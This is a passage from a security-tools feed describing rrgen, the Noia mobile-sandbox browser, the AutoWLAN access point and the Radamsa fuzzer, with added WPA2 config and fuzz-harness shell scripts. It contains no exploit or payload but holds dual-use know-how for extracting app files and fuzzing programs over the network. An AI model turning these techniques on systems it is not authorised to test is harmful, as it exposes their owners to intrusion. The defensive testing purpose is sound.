KitPloit - PenTest & Hacking Tools: leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security (feed updated 2024-03-28)

Rrgen - A Header Only C++ Library For Storing Safe, Randomly Generated Data Into Modern Containers (2024-03-28)
<p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEimHvuKh7PZC2Snz-JxPjI6EAeTw5tkfSU9DXgr0iTvQft6SX25W0EstSsonJtcS8ygefOH13suD_DhS8nTyCU7BJlJyYNTXD9DlkcHY3zH_gpjIl9CTJUUb8NyquGhERs2ImmfVufbwk3bja1s4RB_qEonvWX2roGV5PDagXHTVL9oZ_EoQ9Z6HNB0pCbe"><img alt="" border="0" height="183" id="BLOGGER_PHOTO_ID_7349970944757009890" src="https://blogger.googleusercontent.com/img/a/AVvXsEimHvuKh7PZC2Snz-JxPjI6EAeTw5tkfSU9DXgr0iTvQft6SX25W0EstSsonJtcS8ygefOH13suD_DhS8nTyCU7BJlJyYNTXD9DlkcHY3zH_gpjIl9CTJUUb8NyquGhERs2ImmfVufbwk3bja1s4RB_qEonvWX2roGV5PDagXHTVL9oZ_EoQ9Z6HNB0pCbe=w400-h183" width="400" /></a></p>
<p>This library was developed to combat insecure methods of storing random data into modern C++ containers, such as old and clunky PRNGs. Instead, rrgen uses the STL's random-number engines and distributions to efficiently and safely fill a given C++ container with a random number distribution. Keep in mind that the standard engines (for example std::mt19937) are statistical PRNGs rather than cryptographically secure generators, so the stored values are fine for test data and simulations but should not be used as keys, tokens or nonces.</p>
<h2>Installation</h2>
<p>1) <code>git clone https://github.com/josh0xA/rrgen.git</code><br /> 2) <code>cd rrgen</code><br /> 3) <code>make</code><br /> 4) Add <code>include/rrgen.hpp</code> to your project tree for access to the library classes and functions.</p>
<h2>Official Documentation</h2>
<p><em>rrgen/docs/index.rst</em></p>
<h2>Supported Containers</h2>
<p>1) <code>std::vector<></code><br /> 2) <code>std::list<></code><br /> 3) <code>std::array<></code><br /> 4) <code>std::stack<></code></p>
<h2>Example Usages</h2>
<pre><code>#include "../include/rrgen.hpp"
#include <iostream>

int main(void)
{
    // Example usage for rrgen vector
    rrgen::rrand<float, std::vector, 10> rrvec;
    rrvec.gen_rrvector(false, true, 0, 10);
    for (auto &i : rrvec.contents())
    {
        std::cout << i << " ";
    } // ^ the same as rrvec.show_contents()

    // Example usage for rrgen list (frontside insertion)
    rrgen::rrand<int, std::list, 10> rrlist;
    rrlist.gen_rrlist(false, true, "fside", 5, 25);
    std::cout << '\n'; rrlist.show_contents();
    std::cout << "Size: " << rrlist.contents().size() << '\n';

    // Example usage for rrgen array
    rrgen::rrand_array<int, 5> rrarr;
    rrarr.gen_rrarray(false, true, 5, 35);
    for (auto &i : rrarr.contents())
    {
        std::cout << i << " ";
    } // ^ the same as rrarr.show_contents()

    // Example usage for rrgen stack
    rrgen::rrand_stack<float, 10> rrstack;
    rrstack.gen_rrstack(false, true, 200, 1000);
    for (auto m = rrstack.xsize(); m > 0; m--)
    {
        std::cout << rrstack.grab_top() << " ";
        rrstack.pop_off();
        if (m == 1) { std::cout << '\n'; }
    }
}
</code></pre>
<p>Note: This is a transferred repository, from a completely unrelated project.</p>
<div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/josh0xA/Scylla" rel="nofollow" target="_blank" title="Download Rrgen">Download Rrgen</a></span></b></div>

Noia - Simple Mobile Applications Sandbox File Browser Tool (2024-03-27)
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC8Mic5mTtWtbookhqvM4wYy_oL2OSDQ2-5QSIka9CYaEJaGbtdxt4kPnwqqFu1LDgqP-lk_B2fVkyGAnN-F3_xT5PqJVI4OfCrcgbpQYpAYE7n9EhJ9Ww_FzrowhItg9siRFpOUVTw4b5P6c4_1xI3FvGY9F5VOeH6MzTUhPyudEBv7EBY6uawVYdX0x0/s1002/noia_3_demo.gif" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="666" data-original-width="1002" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC8Mic5mTtWtbookhqvM4wYy_oL2OSDQ2-5QSIka9CYaEJaGbtdxt4kPnwqqFu1LDgqP-lk_B2fVkyGAnN-F3_xT5PqJVI4OfCrcgbpQYpAYE7n9EhJ9Ww_FzrowhItg9siRFpOUVTw4b5P6c4_1xI3FvGY9F5VOeH6MzTUhPyudEBv7EBY6uawVYdX0x0/w640-h426/noia_3_demo.gif" width="640" /></a></p>
<p>Noia is a web-based tool whose main aim is to ease the process of browsing a mobile application's sandbox and directly previewing SQLite databases, images, and more. 
Powered by <a href="https://www.frida.re" rel="nofollow" target="_blank" title="frida.re">frida.re</a>.</p>
<p>Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, open an issue if you find any problems. PRs are welcome.</p>
<h2>Installation & Usage</h2>
<pre><code>npm install -g noia
noia
</code></pre>
<h3>Features</h3>
<ul>
<li>Explore third-party applications' files and directories. Noia shows you details including the access permissions, file type and much more.</li>
<li>View custom binary files. Directly preview SQLite databases, images, and more.</li>
<li>Search applications by name.</li>
<li>Search files and directories by name.</li>
<li>Navigate to a custom directory using the <kbd>ctrl+g</kbd> shortcut.</li>
<li>Download the application's files and directories for further analysis.</li>
<li>Basic iOS support</li>
</ul>
<p>and more</p>
<h2>Setup</h2>
<h3>Desktop requirements:</h3>
<ul>
<li><a href="https://nodejs.org/" rel="nofollow" target="_blank" title="node.js">node.js</a> <strong>LTS</strong> and <a href="https://www.npmjs.com" rel="nofollow" target="_blank" title="npm">npm</a></li>
<li>Any decent modern desktop browser</li>
</ul>
<p>Noia is available on npm, so just type the following commands to install and run it:</p>
<pre><code>npm install -g noia
noia
</code></pre>
<h3>Device setup:</h3>
<p>Noia is powered by <a href="https://www.frida.re" rel="nofollow" target="_blank" title="frida.re">frida.re</a>, and thus requires Frida to run.</p>
<h4>Rooted Device</h4>
<p>See:</p>
<ul>
<li>https://frida.re/docs/android/</li>
<li>https://frida.re/docs/ios/</li>
</ul>
<h4>Non-rooted Device</h4>
<ul>
<li>https://koz.io/using-frida-on-android-without-root/</li>
<li>https://github.com/sensepost/objection/wiki/Patching-Android-Applications</li>
<li>https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/</li>
</ul>
<p><strong>Security Warning</strong></p>
<p>This tool is not secure and may contain security vulnerabilities, so make sure to isolate the web page from potential attackers: keep it reachable only from the analysis host rather than exposing it on a shared network.</p>
<h2>LICENCE</h2>
<p>MIT</p>
<div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/0x742/noia" rel="nofollow" target="_blank" title="Download Noia">Download 
Noia</a></span></b></div>

AutoWLAN - Run A Portable Access Point On A Raspberry Pi Making Use Of Docker Containers (2024-03-26)
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjXeaF5MXK2ti54OpzyTmnxSBjJCv01O1h5s2e47KgqMyf1B2uJah3SNlgxHyIAo9C5CP8KVgOgqbbLdEa7WwTMz5hHRE12aeWqMonC78TEXU7BnnJ_pou9YHvx1pbw32PySusvOh_MZ9scrqDVa3muPyPL8PnYrLGFtIeXefEImlf-k5aoJa4WLrwNLQ1T"><img alt="" border="0" height="368" id="BLOGGER_PHOTO_ID_7349417525795027954" src="https://blogger.googleusercontent.com/img/a/AVvXsEjXeaF5MXK2ti54OpzyTmnxSBjJCv01O1h5s2e47KgqMyf1B2uJah3SNlgxHyIAo9C5CP8KVgOgqbbLdEa7WwTMz5hHRE12aeWqMonC78TEXU7BnnJ_pou9YHvx1pbw32PySusvOh_MZ9scrqDVa3muPyPL8PnYrLGFtIeXefEImlf-k5aoJa4WLrwNLQ1T=w640-h368" width="640" /></a></p>
<p>This project will allow you to run a portable access point on a Raspberry Pi making use of <em>Docker</em> containers.</p>
<p>Further reference and explanations:</p>
<p><a href="https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w" rel="nofollow" target="_blank" title="https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w">https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w</a></p>
<p>Tested on Raspberry Pi Zero W.</p>
<h3>Access point configurations</h3>
<p>You can customize the network password and other configuration in the files under <em>confs/hostapd_confs/</em>. You can also add your own <em>hostapd</em> configuration files here. Of the shipped profiles, only the WPA2 one gives you an encrypted and authenticated network: the open profile sends all traffic in the clear and WEP has been trivially breakable for years, so keep those two for lab exercises. 
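</p>
<p>As an added example, not part of AutoWLAN: a small POSIX shell helper that writes a WPA2-only <em>hostapd.conf</em> in the form the container mounts at <em>/etc/hostapd/hostapd.conf</em>, plus a check that rejects open, WEP or TKIP profiles before you mount them. The interface name, SSID, passphrase and channel are placeholders you pass in; the keys emitted (<code>wpa</code>, <code>wpa_key_mgmt</code>, <code>rsn_pairwise</code>, <code>wpa_passphrase</code> and so on) are standard hostapd options, but the checks on them and the <code>gen_wpa2_conf</code>/<code>check_conf</code> names are this example's own.</p>

```sh
#!/bin/sh
# Added example (not part of AutoWLAN): emit a WPA2-PSK/CCMP-only hostapd
# configuration and sanity-check configs before mounting them into the
# container. Interface, SSID, passphrase and channel are caller-supplied
# placeholders.

# gen_wpa2_conf IFACE SSID PASSPHRASE [CHANNEL]
# Prints a hostapd.conf on stdout; returns 1 (with a message on stderr) if
# the inputs would produce a config hostapd rejects or one that is weak.
gen_wpa2_conf() {
    iface="$1"; ssid="$2"; pass="$3"; chan="${4:-6}"

    # hostapd limits: SSID is 1..32 characters, WPA passphrase is 8..63
    # printable ASCII characters
    if [ -z "$ssid" ] || [ "${#ssid}" -gt 32 ]; then
        echo "gen_wpa2_conf: SSID must be 1-32 characters" >&2; return 1
    fi
    if [ "${#pass}" -lt 8 ] || [ "${#pass}" -gt 63 ]; then
        echo "gen_wpa2_conf: passphrase must be 8-63 characters" >&2; return 1
    fi
    if printf '%s' "$pass" | LC_ALL=C grep -q '[^ -~]'; then
        echo "gen_wpa2_conf: passphrase must be printable ASCII" >&2; return 1
    fi

    cat <<EOF
interface=$iface
driver=nl80211
ssid=$ssid
hw_mode=g
channel=$chan
# open-system authentication only; auth_algs=2 (shared key) is the WEP mode
auth_algs=1
# wpa=2 selects RSN (WPA2) only, without the WPA1 fallback that wpa=3 adds
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
rsn_pairwise=CCMP
wpa_passphrase=$pass
EOF
}

# check_conf FILE
# Returns 0 only if FILE enables WPA2 with CCMP and does not configure WEP
# keys or allow TKIP; open and WEP style profiles fail this check.
check_conf() {
    grep -q '^wpa=2$' "$1" &&
    grep -q '^rsn_pairwise=CCMP$' "$1" &&
    ! grep -q '^wep_key' "$1" &&
    ! grep -q 'TKIP' "$1"
}
```

<p>Write the output to a file and mount it the same way the README mounts <em>wpa2.conf</em>, e.g. <code>-v $(pwd)/my-wpa2.conf:/etc/hostapd/hostapd.conf</code>. Because the container runs with <code>--network=host</code> and <code>NET_ADMIN</code>, it can reconfigure the host's interfaces, so treat the mounted config as trusted input and keep the passphrase out of your shell history where you can.</p>
<p>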
</p>
<h3>Management using plain docker</h3>
<p>Add <em>--rm</em> for volatile containers. Note that <em>--cap-add=NET_ADMIN</em> and <em>--network=host</em> are what let hostapd drive the wireless interface, but they also let the container change the host's interfaces and routing, so only run an image you have built or inspected yourself.</p>
<h5>Create and run a container with default (Open) configuration (stop with Ctrl+C)</h5>
<pre><code>docker run --name autowlan_open --cap-add=NET_ADMIN --network=host autowlan
</code></pre>
<h5>Create and run a container with WEP configuration (stop with Ctrl+C)</h5>
<pre><code>docker run --name autowlan_wep --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wep.conf:/etc/hostapd/hostapd.conf autowlan
</code></pre>
<h5>Create and run a container with WPA2 configuration (stop with Ctrl+C)</h5>
<pre><code>docker run --name autowlan_wpa2 --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wpa2.conf:/etc/hostapd/hostapd.conf autowlan
</code></pre>
<h5>Stop a running container</h5>
<pre><code>docker stop autowlan_{open|wep|wpa2}
</code></pre>
<h3>Management using docker-compose</h3>
<h5>Create and run container (stop with Ctrl+C)</h5>
<pre><code>docker-compose -f <compose-file.yml> up
</code></pre>
<h5>Create and run container in the background</h5>
<pre><code>docker-compose -f <compose-file.yml> up -d
</code></pre>
<h5>Stop a container in the background</h5>
<pre><code>docker-compose -f <compose-file.yml> down
</code></pre>
<h5>Read logs of a container in the background</h5>
<pre><code>docker-compose -f <compose-file.yml> logs
</code></pre>
<div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://gitlab.com/hartek/autowlan" rel="nofollow" target="_blank" title="Download AutoWLAN">Download AutoWLAN</a></span></b></div>

Radamsa - A General-Purpose Fuzzer (2024-03-25)
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRv8MmX1kSllNTxyjH3saj4jONdFKC1DJWtLM-g-D4vQGEeIfuAefGzOxlGfNNEawkikO4O5uae5faHyWo0wowKD5MNye97m4uzOEXh1O0TTTbddHuqA-eV64URVkIeF-9fQj5EB5U6pWU2RPJFHaA7RtGb0k9u-8uukwovtef3R6WKqTi-8bUawEkqPq7/s896/Radamsa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="896" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRv8MmX1kSllNTxyjH3saj4jONdFKC1DJWtLM-g-D4vQGEeIfuAefGzOxlGfNNEawkikO4O5uae5faHyWo0wowKD5MNye97m4uzOEXh1O0TTTbddHuqA-eV64URVkIeF-9fQj5EB5U6pWU2RPJFHaA7RtGb0k9u-8uukwovtef3R6WKqTi-8bUawEkqPq7/w640-h366/Radamsa.png" width="640" /></a></div>
<p>Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable, and it is easy to get up and running.</p>
<h2>Nutshell:</h2>
<pre><code> $ # please please please fuzz your programs. here is one way to get data for it:
 $ sudo apt-get install gcc make git wget
 $ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
 $ echo "HAL 9000" | radamsa
</code></pre>
<h2>What the Fuzz</h2>
<p>Programming is hard. All nontrivial programs have bugs in them. What's more, in some of the most widely used programming languages even the simplest typical mistakes are usually enough for attackers to gain undesired powers.</p>
<p>Fuzzing is one of the techniques to find such unexpected behavior in programs. The idea is simply to subject the program to various kinds of inputs and see what happens. 
There are two parts to this process: producing the various kinds of inputs, and seeing what happens. Radamsa is a solution to the first part; the second part is typically a short shell script. Testers usually have a more or less vague idea of what should <em>not</em> happen, and they try to find out whether this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they typically fuzz instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to disprove, by finding a counterexample, a theorem about the program stating that for all inputs something doesn't happen.</p>
<p>There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.</p>
<p>Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there is a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.</p>
<p>Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.</p>
<h2>Requirements</h2>
<p>Supported operating systems:</p>
<ul> <li>GNU/Linux</li> <li>OpenBSD</li> <li>FreeBSD</li> <li>Mac OS X</li> <li>Windows (using Cygwin)</li> </ul>
<p>Software requirements for building from sources:</p>
<ul> <li>gcc / clang</li> <li>make</li> <li>git</li> <li>wget</li> </ul>
<h2>Building Radamsa</h2>
<pre><code> $ git clone https://gitlab.com/akihe/radamsa.git
 $ cd radamsa
 $ make
 $ sudo make install # optional, you can also just grab bin/radamsa
 $ radamsa --help
</code></pre>
<p>Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.</p>
<h2>Fuzzing with Radamsa</h2>
<p>This section assumes some familiarity with UNIX scripting.</p>
<p>Radamsa can be thought of as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. 
It also supports generating more than one output at a time and acting as a TCP server or client, in case such things are needed.</p>
<p>Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.</p>
<p>In the simplest case, from a scripting point of view, radamsa can be used to fuzz data going through a pipe.</p>
<pre><code> $ echo "aaa" | radamsa
 aaaa
</code></pre>
<p>Here radamsa decided to add one 'a' to the input. Let's try that again.</p>
<pre><code> $ echo "aaa" | radamsa
 ːaaa
</code></pre>
<p>Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated, which is what makes a finding reproducible: record the seed together with the samples whenever a run turns something up.</p>
<pre><code> $ echo "Fuzztron 2000" | radamsa --seed 4
 Fuzztron 4294967296
</code></pre>
<p>This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number (2^32, one past the largest unsigned 32-bit value) might be an interesting one to test for.</p>
<p>You can generate more than one output by using the -n parameter as follows:</p>
<pre><code> $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
 1 + (2 + (2 + (3 + 4?)
 1 + (2 + (3 +?4))
 18446744073709551615 + 4)))
 1 + (2 + (3 + 170141183460469231731687303715884105727))
</code></pre>
<p>There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.</p>
<p>What we have so far can be used, for example, to test programs that read input from standard input, as in</p>
<pre><code> $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
 [...]
 (standard_in) 1418: illegal character: ^_
 (standard_in) 1422: syntax error
 (standard_in) 1424: syntax error
 (standard_in) 1424: memory exhausted
 [hang]
</code></pre>
<p>Or the compiler used to compile Radamsa:</p>
<pre><code> $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
 [...]
 > What is 'ó µ'?
 4901126677
 > $
</code></pre>
<p>Or to test decompression:</p>
<pre><code> $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null
</code></pre>
<p>Typically, however, one might want a separate run of the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:</p>
<pre><code> $ gzip -c /bin/bash > sample.gz
 $ while true; do radamsa sample.gz | gzip -d > /dev/null; done
</code></pre>
<p>Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat, Radamsa will by default write the output to stdout, but unlike cat, when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination: the shell reports a process killed by a signal as 128 plus the signal number, so 139 means SIGSEGV and 134 means SIGABRT, whereas an ordinary error exit such as a parse failure stays below that. This can be done for example as follows:</p>
<pre><code> $ gzip -c /bin/bash > sample.gz
 $ while true
 do
   radamsa sample.gz > fuzzed.gz
   gzip -dc fuzzed.gz > /dev/null
   test $? -gt 127 && break
 done
</code></pre>
<p>This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.</p>
<p>One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given on the command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the outputs on the command line to the target program. We'll make a simple such script for bc, which accepts files from the command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.</p>
<pre><code> $ echo "1 + 2" > sample-1
 $ echo "(124 % 7) ^ 1*2" > sample-2
 $ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
 $ bc sample-* < /dev/null
 3
 10
 5
 $ while true
 do
   radamsa -o fuzz-%n -n 100 sample-*
   bc fuzz-* < /dev/null
   test $? -gt 127 && break
 done
</code></pre>
<p>This will again run until a large exit value signals something obviously interesting, or until the target program gets stuck.</p>
<p>In practice many programs fail in unique ways. 
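</p>
<p>The loops above (pipe a sample through radamsa, write N cases with <code>-o</code> and <code>%n</code>, stop when the exit value exceeds 127) grow into the same harness every time, so here is one as an added example. It is not part of radamsa and not the README's script. It assumes GNU coreutils <code>timeout</code> is installed, that radamsa is on PATH, and that the target takes the test case path as its last argument; the <code>classify_status</code>, <code>run_case</code> and <code>fuzz_round</code> names, the <code>cases/</code> and <code>keep/</code> layout and the <code>fuzz-bc.sh</code> file name are this example's own. It also handles two things the page's loops miss: hangs, which get a per-case deadline and are reported separately from crashes, and sanitizer-built targets, which by default report a finding with exit status 1 rather than a signal unless <code>ASAN_OPTIONS=abort_on_error=1</code> turns it into SIGABRT.</p>

```sh
#!/bin/sh
# Added example (not part of radamsa): a crash/hang triage loop around
# `radamsa -o ... -n N`. Assumes GNU coreutils `timeout`, radamsa on PATH and
# a target that takes the test case path as its last argument.

CASE_TIMEOUT="${CASE_TIMEOUT:-5}"   # seconds before a case counts as a hang
# ASan reports findings with exit status 1 by default, which a ">127" check
# misses; abort_on_error=1 makes it raise SIGABRT (exit 134) instead.
ASAN_OPTIONS="${ASAN_OPTIONS:-abort_on_error=1}"; export ASAN_OPTIONS

# classify_status EXIT_CODE -> ok | error | hang | crash:<signal number>
# Shells report a process killed by signal N as 128+N (139 = SIGSEGV,
# 134 = SIGABRT); coreutils timeout exits 124 when the deadline is hit;
# 1..123 is an ordinary error exit such as bc's "syntax error".
classify_status() {
    case "$1" in
        0)   echo ok ;;
        124) echo hang ;;
        *)   if [ "$1" -gt 128 ]; then echo "crash:$(( $1 - 128 ))"; else echo error; fi ;;
    esac
}

# run_case FILE CMD [ARGS...] -> prints the verdict for `CMD ARGS FILE` and
# returns 0 for ok/error, 1 for hang/crash. stdin is /dev/null so a target
# that falls back to reading stdin (bc does) cannot wait forever on it.
run_case() {
    file="$1"; shift
    timeout "$CASE_TIMEOUT" "$@" "$file" </dev/null >/dev/null 2>&1 && rc=0 || rc=$?
    verdict=$(classify_status "$rc")
    echo "$verdict"
    case "$verdict" in ok|error) return 0 ;; *) return 1 ;; esac
}

# fuzz_round SEED COUNT OUTDIR CMD SAMPLE...
# One radamsa run: COUNT cases derived from the SAMPLE files with SEED, each
# fed to CMD. Cases that crash or hang are kept under OUTDIR/keep with the
# seed and verdict in the file name, so the run is reproducible with
# `radamsa -s SEED`. Prints the number of kept cases.
fuzz_round() {
    seed="$1"; count="$2"; outdir="$3"; cmd="$4"; shift 4
    mkdir -p "$outdir/cases" "$outdir/keep"
    radamsa -s "$seed" -n "$count" -o "$outdir/cases/case-%n" "$@"
    kept=0
    for f in "$outdir"/cases/case-*; do
        v=$(run_case "$f" "$cmd") || {
            cp "$f" "$outdir/keep/$(basename "$f")-seed$seed-$v"
            kept=$((kept + 1))
        }
    done
    rm -f "$outdir"/cases/case-*
    echo "$kept"
}

# Example driver: fuzz bc with a fresh seed per round, 100 cases each, until
# something is kept. Only runs when this file is executed as fuzz-bc.sh
# (a hypothetical name), not when it is sourced for its functions.
if [ "${0##*/}" = "fuzz-bc.sh" ]; then
    seed=1
    while [ "$(fuzz_round "$seed" 100 ./out bc sample-*)" -eq 0 ]; do
        seed=$((seed + 1))
    done
    echo "kept cases are in ./out/keep (last seed: $seed)"
fi
```

<p>Each kept file carries the seed that produced it, so <code>radamsa -s SEED -n COUNT -o ... sample-*</code> regenerates the whole round if you need the neighbouring cases as well. Reading <code>dmesg</code> or attaching <code>gdb</code>, as the next paragraph suggests, is then only needed for the handful of cases the harness kept rather than for every run.</p>
<p>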
Some common ways to catch obvious errors are to check the exit value, to enable fatal signal printing in the kernel and check whether something new turns up in dmesg, to run the program under strace, gdb or valgrind and see if something interesting is caught, to check if an error reporter process has been started after starting the program, etc.</p>
<h2>Output Options</h2>
<p>The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:</p>
<table> <thead> <tr> <th>-o argument</th> <th>meaning</th> <th>example</th> </tr> </thead> <tbody>
<tr> <td>:port</td> <td>act as a TCP server on the given port</td> <td># radamsa -o :80 -n inf samples/*.http-resp</td> </tr>
<tr> <td>ip:port</td> <td>connect as a TCP client to port of ip</td> <td>$ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req</td> </tr>
<tr> <td>-</td> <td>write to stdout</td> <td>$ radamsa -o - samples/*.vt100</td> </tr>
<tr> <td>path</td> <td>write to files, %n is testcase # and %s the first suffix</td> <td>$ radamsa -o test-%n.%s -n 100 samples/*.foo</td> </tr>
</tbody> </table>
<p>Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa. In server mode anything able to connect to that port receives fuzzed data, so run it on an isolated test host or network.</p>
<h2>Related Tools</h2>
<p>A non-exhaustive list of free complementary tools:</p>
<ul> <li>GDB (http://www.gnu.org/software/gdb/)</li> <li>Valgrind (http://valgrind.org/)</li> <li>AddressSanitizer (http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer)</li> <li>strace (http://sourceforge.net/projects/strace/)</li> <li>tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/)</li> </ul>
<p>A non-exhaustive list of related free tools:</p>
<ul> <li>American fuzzy lop (http://lcamtuf.coredump.cx/afl/)</li> <li>Zzuf (http://caca.zoy.org/wiki/zzuf)</li> <li>Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/)</li> <li>Peach (http://peachfuzzer.com/)</li> <li>Sulley (http://code.google.com/p/sulley/)</li> </ul>
<p>Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe, since they are reachable via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.</p>
<h2>Some Known Results</h2>
<p>A robustness testing tool is obviously only good if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. 
For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from out<wbr />side sources.</p>
<p>The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVEs should be read as 'product X is now more robust (against Y)'.</p>
<table> <thead> <tr> <th>CVE</th> <th>program</th> <th>credit</th> </tr> </thead> <tbody>
<tr> <td>CVE-2007-3641</td> <td>libarchive</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2007-3644</td> <td>libarchive</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2007-3645</td> <td>libarchive</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2008-1372</td> <td>bzip2</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2008-1387</td> <td>ClamAV</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2008-1412</td> <td>F-Secure</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2008-1837</td> <td>ClamAV</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2008-6536</td> <td>7-zip</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2008-6903</td> <td>Sophos Anti-Virus</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2010-0001</td> <td>Gzip</td> <td>integer underflow in unlzw</td> </tr>
<tr> <td>CVE-2010-0192</td> <td>Acroread</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2010-1205</td> <td>libpng</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2010-1410</td> <td>Webkit</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2010-1415</td> <td>Webkit</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2010-1793</td> <td>Webkit</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2010-2065</td> <td>libtiff</td> <td>found by CERT-FI</td> </tr>
<tr> <td>CVE-2010-2443</td> <td>libtiff</td> <td>found by CERT-FI</td> </tr>
<tr> <td>CVE-2010-2597</td> <td>libtiff</td> <td>found by CERT-FI</td> </tr>
<tr> <td>CVE-2010-2482</td> <td>libtiff</td> <td>found by CERT-FI</td> </tr>
<tr> <td>CVE-2011-0522</td> <td>VLC</td> <td>found by Harry Sintonen</td> </tr>
